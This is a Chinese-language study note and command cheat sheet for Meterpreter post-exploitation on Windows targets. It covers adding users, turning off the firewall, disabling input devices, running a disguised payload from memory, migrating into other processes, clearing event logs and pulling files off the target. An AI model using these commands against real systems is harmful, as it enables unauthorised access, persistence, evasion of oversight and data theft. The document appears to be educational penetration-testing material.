后渗透之meterpreter学习笔记

0x00 前言

由于最近想学习关于内网渗透的一些知识，前面也有师傅写了关于meterpreter的使用攻略，我这里就来复现学习一下。
Meterpreter是Metasploit框架中的一个扩展模块，作为后渗透阶段的利器，其强大之处可想而知，我这里就简单介绍一下在渗透中可能用的到的一些命令，如若有什么不对的地方还请师傅们多多指教。

0x01 系统命令

基本系统命令

background   # 将当前会话放置后台
sessions   # sessions –h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
bgrun / run   # 执行已有的模块，输入run后按两下tab，列出已有的脚本
info   # 查看已有模块信息
getuid   # 查看当前用户身份
getprivs  # 查看当前用户具备的权限
getpid   # 获取当前进程ID(PID)
sysinfo   # 查看目标机系统信息
irb   # 开启ruby终端
ps   # 查看正在运行的进程    
kill <PID值> # 杀死指定PID进程
idletime     # 查看目标机闲置时间
reboot / shutdown    # 重启/关机
shell    # 进入目标机cmd shell

常用cmd命令

whoami  # 当前权限
quser  # 查询当前在线的管理员
net user  # 查看存在用户
net user 用户名 密码 /add  # 添加用户和对应密码
net localgroup 用户组名 用户名 /add  # 将指定用户添加到指定用户组
netstat -ano  # 查询当前计算机中网络连接通信情况，LISTENING表示该端口处于监听状态；ESTABLISHED表示该端口处于工作（通信）状态
systeminfo  # 查看当前计算机中的详细情况
tasklist /svc  # 查看每个进程所对应的服务
taskkill /f /im 程序名称  # 结束某个指定名称的程序
taskkill /f /PID ID  # 结束某个指定PID的进程
tasklist | findstr "字符串" # 查找输出结果中指定的内容
netsh adcfirewall set allprofiles state off  # 关闭防火墙
logoff  # 注销某个指定用户的ID
shutdown -r  # 重启当前计算机

uictl开关键盘/鼠标

uictl [enable/disable] [keyboard/mouse/all]  # 开启或禁止键盘/鼠标
uictl disable mouse  # 禁用鼠标
uictl disable keyboard  # 禁用键盘

execute执行文件

execute #在目标机中执行文件
execute -H -i -f  cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
# -d 在目标主机执行时显示的进程名称（用以伪装）-m 直接从内存中执行
"-o hack.txt"是payload.exe的运行参数

migrate进程迁移

getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    # 将Meterpreter会话移植到指定pid值进程中
kill <pid值>   # 杀死进程

clearev清除日志

clearev  # 清除windows中的应用程序日志、系统日志、安全日志

0x02 文件系统命令

基本文件系统命令

ls  # 列出当前目录中的文件列表
cd  # 进入指定目录
getwd / pwd  # 查看当前工作目录  
search -d c:\\ -f *.txt  # 搜索文件  -d 目录 -f 文件名
cat c:\\123.txt  # 查看文件内容
upload /tmp/hack.txt C:\\  # 上传文件到目标机上
download c:\\123.txt /tmp/  # 下载文件到本机上
edit c:\\test.txt  # 编辑或创建文件  没有的话，会新建文件
rm C:\\hack.txt  # 删除文件
mkdir admin  # 只能在当前目录下创建文件夹
rmdir admin